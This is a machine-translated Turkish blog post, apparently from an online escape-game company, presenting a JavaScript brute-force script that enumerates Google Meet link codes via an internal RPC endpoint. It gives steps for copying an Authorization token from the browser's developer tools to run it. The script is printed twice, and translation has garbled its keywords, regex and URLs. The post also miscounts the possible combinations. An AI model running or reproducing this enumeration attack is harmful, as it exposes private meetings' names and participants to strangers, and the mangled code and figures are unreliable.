Visio – Google Meet | Dyrk, Dyna Meet – Visio
Visio ile tanışın
Contents
randomize = () => dico = dico.Bölmek (”).Harita (değer => ((< value, sort: Math.random() >)).büyü ((a, b) => a.Büyü – B.hecelemek).HARİTA ((< value >) => değer).Katılmak (”),
Newpaternkey = () => “xxx-xxxx-xxx”.Bölmek (”).Harita (c => c == ‘-‘?C: String.From Charcode (Matematik.Zemin (Matematik.Random ()*25) +97)).Katılmak (”),
Key = newpaternkey (), sayaç = 20;
Next = () => Anahtar.Bölmek (”).Harita (e => e == ‘-‘ ? E: Dico [Dico.İndexof (e) + 1> = dico.uzunluk ? 0: DICO.İndexof (e) + 1]).Katılmak (”),
Counter = 0;
Meetlink = ‘https: // buluş.Google.com/’, mevcut TOE = () => xhr = yeni xmlHTTPRequest ();
Eğer (sayacı ++> = 20) sayaç = 0;
Key = newPaternkey ();
Randomize ();
>
Key = Next ();
XHR.Open (‘Get’, MeetLink + Key);
XHR.Addeventlisner (‘yük’, (e) => getir (MeetLink.Concat (“/$ rpc/google.RTC.toplantılar.V1.MeetingsPaceservice/ResolVemeetingspace “,” başlıklar “:” Yetkilendirme “: Yetkilendirme,
“İçerik Tipi”: “Uygulama/X-Protobuf”,
“X-goog-adep-anahtar”: e.hedef.sorumluluk.Match (/\ [“https \: \/\/buluşma \.Google\.com \ “\,” ([a-za-z0-9 \ _ \-]) “\]/) [1],
“X-Goog-authuse”: “0”,
“X-goog-icode-réspose-if-icututable”: “Base64”,
“X-Goog-Meeting-tanımlayıcı”: btoa (‘\ b \ x02 \ x12 \ f’.Concat (Anahtar)),
>,
“Beden”: “\ n \ f”.Concat (anahtar, “0 \ u0001”),
“Yöntem”: “Post”
>).Sonra (e => e.Metin ())
.Sonra (e => setTimeout (mevcut, 100);
konsol.Log (MeetLink.Concat (Anahtar).BeautifyDisplay (38), (E.Değiştirin (/[^a-za-z0-9]/g, “”)+””).BeautifyDisplay (38));
>);
>);
XHR.Göndermek ();
>;
Sicim.prototip.BeautifyDisplay = Function (boyut) < let txt = this.valueOf(); return txt.concat(' '.repeat(txt.length >boyut ? TXT.Uzunluk: boyut)).Substr (0, boyut).Concat (‘|’); >,
konsol.Temizlemek ();
mevcut ();
>) ()
Dyrk
Şu anda siber güvenlik alanında çalışıyor, düzenli olarak oldukça önemsiz durumlarla karşılaşıyorum.
En son, bir toplantı sırasında bir kişinin izinsiz girişi .
Neyse ki, güvenlik için Google Meet, hem katılımcıları bir kişinin video konferansa katılmayı amaçladığı konusunda hem de kabul etmesini veya reddetmesini sağlayan bir özellik içeriyordu.
Ancak, bu olay beni kendime bir dizi soru sormaya getiriyor .
Google Meet Link’in karmaşıklığı
Her şeyden önce, bir kişinin davet edilmeden bir buluşma bağlantısına bağlanması nasıl mümkün olabilir? ?
Bağlantının sadeliğini göz önünde bulundurmalıyız: https: // google.tanışmak.com/Xxx -yyyy -zzzz
Xxx -yyyy -zzzz sadece A ve Z arasındaki alfabetik karakterlerdir, yani her karakter için 27 olası kombinasyon.
Matematikçiler için:
27 x 27 x 27 x 27 x 27 x 27 x 27 x 27 x 27 x 27 Olası kombinasyonlar .
Bir Google Meet bağlantısının ömrü
Artık “Google Meet” konferans bağlarımızın bağlantılarının nasıl oluşturulduğunu daha iyi anlayabilmemize rağmen, dikkate alınması gereken çok önemli bir husus var . Bir Google Meet bağlantısının ömrü !
Gerçekten herkes Google toplantıları birkaç tıklamayla oluşturabilir.
Ama birkaç gün, haftalar veya aylar sonra . Bağlantılar artık geçerli değil.
Bu nedenle oluşturulan bağlantıların belirli bir geçerlilik dönemi vardır .
İstisna “tekrarlayan” olaylar yapın ve burası ilginç hale geliyor.
İş dünyasında, düzenli olarak organize etmek için birçok fırsat vardır (ekip / iş, günlük, haftalık, aylık,, . )).
Bir çalışan bu tür bir etkinliği gündemlerinde oluşturduğunda, otomatik olarak bir Google Meet bağlantısı oluşturulur. Bu değişmez.
Yani bu olay için her seferinde aynı bağlantıya sahip olacaksınız.
Biraz JavaScript ve Brute Force ile ?
Tüm bu unsurlarla, şimdi tüm olasılıkları süpürmek için donanımlıyız ve videokokasyonlara bağlantıları tespit etmek için yüksek bir olasılıklara ulaşıyoruz !
Bu yüzden, sonsuz sayıda kombinasyonu deneyecek bir JavaScript kodu yazmak için Google Meet’in çalışmasını biraz retro-sigortaladım
(C) Dyrk.Org 2023-2024 – Meet’s Rulette
(1) Bu komut dosyasını https: // google adresinde çalıştırın.tanışmak.com
(2) Googles’inizin “XHR istekleri” başlıklarında geçerli bir yetkilendirme jetonu ile yetkilendirmenin değişkenini bulun ve güncelleyin
İzin versin = “SapisiDhash xxxxxxxxxxxxxx_xxxxxxxxxxxxxxxxxxxxxxxxxx“, dico =” abcdefghijklmnopqrstuvxz “,
randomize = () => dico = dico.Bölmek (”).Harita (değer => ((< value, sort: Math.random() >)).büyü ((a, b) => a.Büyü – B.hecelemek).HARİTA ((< value >) => değer).Katılmak (”),
Newpaternkey = () => “xxx-xxxx-xxx”.Bölmek (”).Harita (c => c == ‘-‘?C: String.From Charcode (Matematik.Zemin (Matematik.Random ()*25) +97)).Katılmak (”),
Key = newpaternkey (), sayaç = 20;
Next = () => Anahtar.Bölmek (”).Harita (e => e == ‘-‘ ? E: Dico [Dico.İndexof (e) + 1> = dico.uzunluk ? 0: DICO.İndexof (e) + 1]).Katılmak (”),
Counter = 0;
Meetlink = ‘https: // buluş.Google.com/’, mevcut TOE = () => xhr = yeni xmlHTTPRequest ();
Eğer (sayacı ++> = 20) sayaç = 0;
Key = newPaternkey ();
Randomize ();
>
Key = Next ();
XHR.Open (‘Get’, MeetLink + Key);
XHR.Addeventlisner (‘yük’, (e) => getir (MeetLink.Concat (“/$ rpc/google.RTC.toplantılar.V1.MeetingsPaceservice/ResolVemeetingspace “,” başlıklar “:” Yetkilendirme “: Yetkilendirme,
“İçerik Tipi”: “Uygulama/X-Protobuf”,
“X-goog-adep-anahtar”: e.hedef.sorumluluk.Match (/\ [“https \: \/\/buluşma \.Google\.com \ “\,” ([a-za-z0-9 \ _ \-]) “\]/) [1],
“X-Goog-authuse”: “0”,
“X-goog-icode-réspose-if-icututable”: “Base64”,
“X-Goog-Meeting-tanımlayıcı”: btoa (‘\ b \ x02 \ x12 \ f’.Concat (Anahtar)),
>,
“Beden”: “\ n \ f”.Concat (anahtar, “0 \ u0001”),
“Yöntem”: “Post”
>).Sonra (e => e.Metin ())
.Sonra (e =>
SetTimeout (mevcut, 100);
konsol.Log (MeetLink.Concat (Anahtar).BeautifyDisplay (38), (E.Değiştirin (/[^a-za-z0-9]/g, “”)+””).BeautifyDisplay (38));
>);
>);
XHR.Göndermek ();
>;
Sicim.prototip.BeautifyDisplay = Function (boyut) < let txt = this.valueOf(); return txt.concat(' '.repeat(txt.length >boyut ? TXT.Uzunluk: boyut)).Substr (0, boyut).Concat (‘|’); >,
konsol.Temizlemek ();
mevcut ();
>) ()
Tüm bunları çalıştırmak için gerekli olacaktır:
- Sayfayı aç https: // buluş.Google.com
- Geliştirici Konsolunu Aç
- “Ağ” sekmesinde, Getir / XHR’yi süzün ve bir jeton jetonunu kurtar“Yetki”
- Yukarıdaki kaynak kodu kopyalayıp yapıştırın ve yerine koyun belirteci belirtti.
- Klavyenizdeki “Giriş” anahtarıyla doğrulayın.
“Yetkilendirme” jetonunun kurtarılması:
Merak için, bu senaryoların sonucunun böyle görünmesi gereken şey budur.
Bu nedenle, video konferans alanının mevcut olmadığını bildiren satırları not ediyoruz.
Ve bizi konferansın jetonunu koyan diğerleri ! Bu nedenle bağlantının geçerli olduğunu belirtir;)
Ancak, bir buluşma bağlantısında birkaç saniye içinde düşmeyi beklemeyin ^^
(Biraz şanslı bir adam değilseniz)
En az yarım saat çalışmasına izin vererek büyük sabır olmanız gerekecek.
Çözüm
Geçerli bir Google Meet bağlantısı bulmak için Loto kazanmaktan daha fazla şansın olduğunu panik yapmayın.
Dikkat ! Bağlanmaya gerek kalmadan belirli bilgilere geçerli bir buluşma bağlantısı ile karşılaşan bir kişi:
Toplantının adı (bu nedenle gizli bilgileri kaymaktan kaçının) ve bağlı katılımcılar (tüm veya oyun).
Visio ile tanışın
Çevrimiçi soygun
Aynı anda 1000 oyuncuya kadar
Visio’da kolay bir erişim platformu
Horizon 2024
Aynı anda 1000 oyuncuya kadar
Visio’da kolay bir erişim platformu
Charlie nerede ?!
Aynı anda 1000 oyuncuya kadar
Visio’da kolay bir erişim platformu
Enigma Misyonu
Aynı anda 1000 oyuncuya kadar
Visio’da kolay bir erişim platformu
Siber güvenlik farkındalığı
Aynı anda 5000 oyuncuya kadar
Visio’da kolay bir erişim platformu
Noel’i kurtar !
Aynı anda 1000 oyuncuya kadar
Visio’da kolay bir erişim platformu
Telif Hakkı © 2023 – Dyna’meet
Çerezlere onay ver
En iyi deneyimleri sunmak için, cihazların bilgilerini depolamak ve/veya erişmek için çerezler gibi teknolojileri kullanıyoruz. Bu teknolojilere izin vermek, navigasyon davranışı veya bu sitedeki benzersiz kimlikler gibi verileri işlememize izin verecektir. Onayınızı onaylamama veya geri çekilmeme gerçeği, belirli özellikler ve işlevler üzerinde olumsuz bir etkiye sahip olabilir.
Fonksiyonel fonksiyonel her zaman aktive edilir
Abone veya kullanıcı tarafından açıkça talep edilen belirli bir hizmetin kullanılmasına izin vermek veya bir elektronik iletişim ağına iletişimin iletilmesi amacıyla, meşru faizin sonunda depolama veya teknik erişim kesinlikle gereklidir.
Tercihler Tercihleri
Abone veya hizmeti kullanan kişi tarafından talep edilmeyen tercihleri depolamak için meşru faiz amacıyla depolama veya teknik erişim gereklidir.
İstatistiksel istatistikler
Yalnızca istatistiksel amaçlar için kullanılan depolama veya teknik erişim. Sadece anonim istatistiksel amaçlarla kullanılan depolama veya teknik erişim. Bir çağrı görünmediği durumunda, internet erişim sağlayıcınızın gönüllü uyumluluğu veya üçüncü bir taraftan ek kayıtlar, bu amaçla depolanan veya çıkarılan bilgiler genellikle sizi tanımlamak için kullanılamaz.
Reklam göndermek için kullanıcı profilleri oluşturmak veya kullanıcıyı bir web sitesinde veya benzer pazarlama amaçlı birkaç web sitesinde takip etmek için depolama veya teknik erişim gereklidir.